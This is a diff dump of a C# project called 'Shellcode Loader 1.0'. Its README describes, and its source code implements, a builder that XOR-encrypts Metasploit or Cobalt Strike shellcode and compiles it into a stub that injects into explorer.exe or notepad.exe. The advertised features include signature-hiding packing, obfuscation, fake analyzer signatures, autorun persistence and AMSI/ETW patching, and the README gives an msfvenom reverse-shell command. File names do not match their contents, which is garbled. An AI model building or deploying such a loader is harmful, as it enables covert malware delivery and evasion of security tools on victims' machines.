-

Author: K3rnel-Dev

1.png

@@ -0,0 +1,54 @@
+# ⚔️ <b>Shellcode Loader 1.0</b>
+>![Banner](banner.png)
+
+```diff
+- to compile this project required and dnlib package
+```
+
+# 📕 About 
+> <b>This is a simple implementation of my automated shellcode-loader builder when we do not have an executable file or we need to take the shellcode directly from the file and implement a program that needs to be loaded onto the end station, I automated this a little with support for shellcode encryption, its bytes are taken and encrypted using xor and when launched, they are decrypted in memory in one of these processes "explorer" or "notepad", so far there are only 2 processes to choose from, in the future I will slightly correct this option. The builder also has support for a packer to compress the main loader and hide static signatures, and there is also an obfuscator functionality containing various loader mutation algorithms, these are simple algorithms designed for simple obfuscation, there is also support for fake signatures for the DIE static analyzer. The actual shellcode bytes are taken and parsed directly from the file, their pattern is { 0x... <PAYLOAD BYTES> }. Then the standard process: encryption, transfer to the loader stub and compilation.</b>
+
+# 💉 Support shellcode:
+    1) Metasploit shellcode (csharp)
+    2) Cobalt Strike shellcode (csharp)
+
+ ```shell
+ msfvenom -p windows/shell_reverse_tcp LHOST=<iface> LPORT=<port> -f csharp > shell.txt # metaslpoit
+
+ # Cobalt Strike
+ Payloads -> Stager Payload Generator
+ Output -> C#
+ Use x64 payload -> set true
+ ```
+<br>
+
+# ⚙️ Features
+- 🖥️ **Compress**: Simple implementation of compression and hiding of static signatures of the main loader.
+- ⚔️ **Shellcode Encryption**: Shellcode Byte Encryption and Decryption and their Implementation in Memory.
+- 🚀 **Autorun**: Autostart application after OS restart.
+- ⚙️ **Conditional Compilation**: Allows the builder to include only the features and options chosen by the user, making the final build more streamlined.
+- 🔒 **Custom Renaming and Obfuscation**: Includes customizable renaming of functions and string encryption to make the code less readable and harder to analyze.
+- 🎃 **Amsi/Etw patches**: Support for "EtwEventTrace" patches and "AmsiScanBuffer" functions.
+<br>
+
+# 📽️ Showcase:
+
+
+## 📸 **Screens**: 
+> ![1](1.png)
+> ![2](2.png)
+> ![3](3.png)
+<br>
+
+## ⚠️ **Disclaimer**: 
+```
+This project is for educational purposes only, intended for studying malware and security techniques. The author is not responsible for any malicious use of this software.
+```
+<br>
+
+# ⭐ Credits 
+
+- **Author**: <a href="https://github.com/k3rnel-dev">@K3rnel-Dev</a>
+- **dnlib**: A library for manipulating .NET assemblies.  
+  GitHub: [https://github.com/0xd4d/dnlib](https://github.com/0xd4d/dnlib)
+---

2.png

@@ -0,0 +1,25 @@
+
+Microsoft Visual Studio Solution File, Format Version 12.00
+# Visual Studio Version 16
+VisualStudioVersion = 16.0.34931.43
+MinimumVisualStudioVersion = 10.0.40219.1
+Project("{FAE04EC0-301F-11D3-BF4B-00C04F79EFBC}") = "Builder", "Builder\Builder.csproj", "{E8A34EFA-1A09-45ED-BEFE-20C865010118}"
+EndProject
+Global
+	GlobalSection(SolutionConfigurationPlatforms) = preSolution
+		Debug|Any CPU = Debug|Any CPU
+		Release|Any CPU = Release|Any CPU
+	EndGlobalSection
+	GlobalSection(ProjectConfigurationPlatforms) = postSolution
+		{E8A34EFA-1A09-45ED-BEFE-20C865010118}.Debug|Any CPU.ActiveCfg = Debug|Any CPU
+		{E8A34EFA-1A09-45ED-BEFE-20C865010118}.Debug|Any CPU.Build.0 = Debug|Any CPU
+		{E8A34EFA-1A09-45ED-BEFE-20C865010118}.Release|Any CPU.ActiveCfg = Release|Any CPU
+		{E8A34EFA-1A09-45ED-BEFE-20C865010118}.Release|Any CPU.Build.0 = Release|Any CPU
+	EndGlobalSection
+	GlobalSection(SolutionProperties) = preSolution
+		HideSolutionNode = FALSE
+	EndGlobalSection
+	GlobalSection(ExtensibilityGlobals) = postSolution
+		SolutionGuid = {591206BC-DA35-4CB2-B40C-BA22456B8201}
+	EndGlobalSection
+EndGlobal

3.png

@@ -0,0 +1,115 @@
+<?xml version="1.0" encoding="utf-8"?>
+<Project ToolsVersion="15.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
+  <Import Project="$(MSBuildExtensionsPath)\$(MSBuildToolsVersion)\Microsoft.Common.props" Condition="Exists('$(MSBuildExtensionsPath)\$(MSBuildToolsVersion)\Microsoft.Common.props')" />
+  <PropertyGroup>
+    <Configuration Condition=" '$(Configuration)' == '' ">Debug</Configuration>
+    <Platform Condition=" '$(Platform)' == '' ">AnyCPU</Platform>
+    <ProjectGuid>{E8A34EFA-1A09-45ED-BEFE-20C865010118}</ProjectGuid>
+    <OutputType>WinExe</OutputType>
+    <RootNamespace>Builder</RootNamespace>
+    <AssemblyName>PROLoader</AssemblyName>
+    <TargetFrameworkVersion>v4.0</TargetFrameworkVersion>
+    <FileAlignment>512</FileAlignment>
+    <Deterministic>true</Deterministic>
+  </PropertyGroup>
+  <PropertyGroup Condition=" '$(Configuration)|$(Platform)' == 'Debug|AnyCPU' ">
+    <PlatformTarget>AnyCPU</PlatformTarget>
+    <DebugSymbols>true</DebugSymbols>
+    <DebugType>full</DebugType>
+    <Optimize>false</Optimize>
+    <OutputPath>bin\Debug\</OutputPath>
+    <DefineConstants>DEBUG;TRACE</DefineConstants>
+    <ErrorReport>prompt</ErrorReport>
+    <WarningLevel>4</WarningLevel>
+  </PropertyGroup>
+  <PropertyGroup Condition=" '$(Configuration)|$(Platform)' == 'Release|AnyCPU' ">
+    <PlatformTarget>AnyCPU</PlatformTarget>
+    <DebugType>none</DebugType>
+    <Optimize>true</Optimize>
+    <OutputPath>Binaries\</OutputPath>
+    <DefineConstants>TRACE</DefineConstants>
+    <ErrorReport>none</ErrorReport>
+    <WarningLevel>4</WarningLevel>
+  </PropertyGroup>
+  <PropertyGroup>
+    <ApplicationIcon>icon.ico</ApplicationIcon>
+  </PropertyGroup>
+  <PropertyGroup>
+    <StartupObject />
+  </PropertyGroup>
+  <ItemGroup>
+    <Reference Include="dnlib, Version=4.4.0.0, Culture=neutral, PublicKeyToken=50e96378b6e77999, processorArchitecture=MSIL">
+      <HintPath>..\packages\dnlib.4.4.0\lib\net35\dnlib.dll</HintPath>
+    </Reference>
+    <Reference Include="System" />
+    <Reference Include="System.Core" />
+    <Reference Include="System.Data.DataSetExtensions" />
+    <Reference Include="Microsoft.CSharp" />
+    <Reference Include="System.Data" />
+    <Reference Include="System.Deployment" />
+    <Reference Include="System.Drawing" />
+    <Reference Include="System.Messaging" />
+    <Reference Include="System.Windows.Forms" />
+    <Reference Include="System.Xml" />
+  </ItemGroup>
+  <ItemGroup>
+    <Compile Include="Core\Compilator.cs" />
+    <Compile Include="Core\Helper.cs" />
+    <Compile Include="Core\HelperCompress.cs" />
+    <Compile Include="Core\Obfuscator.cs" />
+    <Compile Include="Core\PackerCompilator.cs" />
+    <Compile Include="Form\CMain.cs">
+      <SubType>Form</SubType>
+    </Compile>
+    <Compile Include="Form\CMain.Designer.cs">
+      <DependentUpon>CMain.cs</DependentUpon>
+    </Compile>
+    <None Include="packages.config" />
+    <None Include="Resources\stub.cs" />
+    <None Include="Resources\PackerStub.cs" />
+    <Compile Include="Runtime.cs" />
+    <Compile Include="Properties\AssemblyInfo.cs" />
+    <EmbeddedResource Include="Form\CMain.resx">
+      <DependentUpon>CMain.cs</DependentUpon>
+    </EmbeddedResource>
+    <EmbeddedResource Include="Properties\Resources.resx">
+      <Generator>ResXFileCodeGenerator</Generator>
+      <LastGenOutput>Resources.Designer.cs</LastGenOutput>
+      <SubType>Designer</SubType>
+    </EmbeddedResource>
+    <Compile Include="Properties\Resources.Designer.cs">
+      <AutoGen>True</AutoGen>
+      <DependentUpon>Resources.resx</DependentUpon>
+      <DesignTime>True</DesignTime>
+    </Compile>
+    <None Include="Properties\Settings.settings">
+      <Generator>SettingsSingleFileGenerator</Generator>
+      <LastGenOutput>Settings.Designer.cs</LastGenOutput>
+    </None>
+    <Compile Include="Properties\Settings.Designer.cs">
+      <AutoGen>True</AutoGen>
+      <DependentUpon>Settings.settings</DependentUpon>
+      <DesignTimeSharedInput>True</DesignTimeSharedInput>
+    </Compile>
+  </ItemGroup>
+  <ItemGroup>
+    <None Include="Resources\logo.png" />
+  </ItemGroup>
+  <ItemGroup>
+    <None Include="Resources\Cobalt_Strike_logo.png" />
+  </ItemGroup>
+  <ItemGroup>
+    <None Include="Resources\close.png" />
+  </ItemGroup>
+  <ItemGroup>
+    <None Include="Resources\expand.png" />
+  </ItemGroup>
+  <ItemGroup>
+    <Content Include="icon.ico" />
+  </ItemGroup>
+  <Import Project="$(MSBuildToolsPath)\Microsoft.CSharp.targets" />
+  <PropertyGroup>
+    <PostBuildEvent>
+    </PostBuildEvent>
+  </PropertyGroup>
+</Project>

README.md

@@ -0,0 +1,161 @@
+using Microsoft.CSharp;
+using System;
+using System.CodeDom.Compiler;
+using System.IO;
+using System.Linq;
+using System.Text.RegularExpressions;
+
+namespace Builder.Core
+{
+    class Compilator
+    {
+        #region Compile Init
+        public static string PerformCompilate
+            (
+            string targetFile, string outPath, bool a64, bool a86, 
+            string IconFile, string AssemblyFile, bool UseObfuscate, bool UseAutorun, bool UseCompress, string injectProcess
+            )
+        {
+            if (File.Exists(targetFile))
+            {
+                byte[] RandomXor = Helper.GenerateRandomBytes(32);
+
+                byte[] bytePayload = Helper.EncryptShellcodeFromFile(targetFile, RandomXor);
+
+                string result = CompileStub(bytePayload, RandomXor, outPath, a64, a86, IconFile, AssemblyFile, UseObfuscate, UseAutorun, UseCompress, injectProcess);
+                return result;
+            }
+
+            return "Failed to compile!\nFile does not exists. . .";
+        }
+        #endregion
+
+        #region Compile Algorithm
+        public static string CompileStub
+            (
+            byte[] encPayload, byte[] key, string outPath, bool a64, bool a86, 
+            string IconFile, string AssemblyFile, bool UseObfuscate, bool UseAutorun, bool UseCompress, string injectProcess
+            )
+        {
+            string stubSourceCode = Properties.Resources.stub;
+
+            if (injectProcess.Contains("explorer"))
+            { 
+                stubSourceCode = stubSourceCode.Replace("%process_to_inject%", "C:\\\\Windows\\\\explorer.exe"); 
+            }
+
+            else 
+            { 
+                stubSourceCode = stubSourceCode.Replace("%process_to_inject%", "c:\\\\windows\\\\system32\\\\notepad.exe"); 
+            }
+
+
+            string hexArray = Helper.GenerateHexArray(encPayload);
+
+            stubSourceCode = Regex.Replace(
+                stubSourceCode,
+                @"public static byte\[\] Payload = new byte\[\] \{.*?\};",
+                "public static byte[] Payload = " + hexArray,
+                RegexOptions.Singleline
+            );
+
+            string newKey = "public static byte[] Key = new byte[] { " + string.Join(", ", key.Select(b => "0x" + b.ToString("X2"))) + " };";
+            stubSourceCode = Regex.Replace(
+                stubSourceCode,
+                @"public static byte\[\] Key = new byte\[\] \{.*?\};",
+                newKey,
+                RegexOptions.Singleline
+            );
+
+            CompilerParameters parameters = new CompilerParameters
+            {
+                GenerateExecutable = true,
+                OutputAssembly = outPath,
+                CompilerOptions = "/target:winexe",
+                IncludeDebugInformation = false
+            };
+
+            if (a64)
+            { 
+                parameters.CompilerOptions += " /platform:x64"; 
+            }
+
+            if (a86) 
+            { 
+                parameters.CompilerOptions += " /platform:x86"; 
+            }
+
+            if (UseAutorun)
+            {
+                parameters.CompilerOptions += " /define:UseAutorun";
+            }
+
+            if (!string.IsNullOrEmpty(AssemblyFile) && File.Exists(AssemblyFile))
+            {
+                parameters.CompilerOptions += " /define:UseAssembly";
+                var metadata = File.ReadAllLines(AssemblyFile);
+
+                string title = metadata.Length > 0 ? metadata[0] : "N/A";
+                string description = metadata.Length > 1 ? metadata[1] : "N/A";
+                string company = metadata.Length > 2 ? metadata[2] : "N/A";
+                string product = metadata.Length > 3 ? metadata[3] : "N/A";
+                string copyright = metadata.Length > 4 ? metadata[4] : "N/A";
+                string trademarks = metadata.Length > 5 ? metadata[5] : "N/A";
+                string fileVersion = metadata.Length > 6 ? metadata[6] : "N/A";
+                string productVersion = metadata.Length > 7 ? metadata[7] : "N/A";
+
+                stubSourceCode = stubSourceCode.Replace("%TITLE%", title);
+                stubSourceCode = stubSourceCode.Replace("%DESC%", description);
+                stubSourceCode = stubSourceCode.Replace("%COMPANY%", company);
+                stubSourceCode = stubSourceCode.Replace("%PRODUCT%", product);
+                stubSourceCode = stubSourceCode.Replace("%COPYRIGHT%", copyright);
+                stubSourceCode = stubSourceCode.Replace("%TRADEMARK%", trademarks);
+                stubSourceCode = stubSourceCode.Replace("%VERSION%", productVersion);
+                stubSourceCode = stubSourceCode.Replace("%FILE_VERSION%", fileVersion);
+            }
+
+            parameters.ReferencedAssemblies.Add("System.dll");
+            parameters.ReferencedAssemblies.Add("System.Core.dll");
+            parameters.ReferencedAssemblies.Add("System.Runtime.InteropServices.dll");
+            parameters.ReferencedAssemblies.Add("System.Diagnostics.Process.dll");
+            parameters.ReferencedAssemblies.Add("System.Linq.dll");
+
+            if (!string.IsNullOrEmpty(IconFile) && File.Exists(IconFile))
+            {
+                parameters.CompilerOptions += $" /win32icon:\"{IconFile}\"";
+            }
+
+            using (CSharpCodeProvider codeProvider = new CSharpCodeProvider())
+            {
+                CompilerResults results = codeProvider.CompileAssemblyFromSource(parameters, stubSourceCode);
+
+                if (results.Errors.Count > 0)
+                {
+                    foreach (CompilerError error in results.Errors)
+                    {
+                        Console.WriteLine($"Error compilation: {error.ErrorText}");
+                        Console.WriteLine($"File: {error.FileName}");
+                        Console.WriteLine($"String: {error.Line}, Column: {error.Column}");
+                        Console.WriteLine($"ID Error: {error.ErrorNumber}");
+                        Console.WriteLine($"This {(error.IsWarning ? "Warning" : "Error")}");
+                        Console.WriteLine(new string('-', 50));
+                    }
+                    throw new InvalidOperationException("Failed to compilate.");
+                }
+            }
+
+            if (UseObfuscate)
+            {
+                Obfuscator.PerformObfuscation(outPath);
+            }
+
+            if (UseCompress)
+            {
+                PackerCompilator.PerformPacking(outPath, UseObfuscate, IconFile, AssemblyFile);
+            }
+
+            return $"Compiling successfull!\nBuild-File: {Path.GetFileNameWithoutExtension(outPath)}";
+        }
+        #endregion
+    }
+}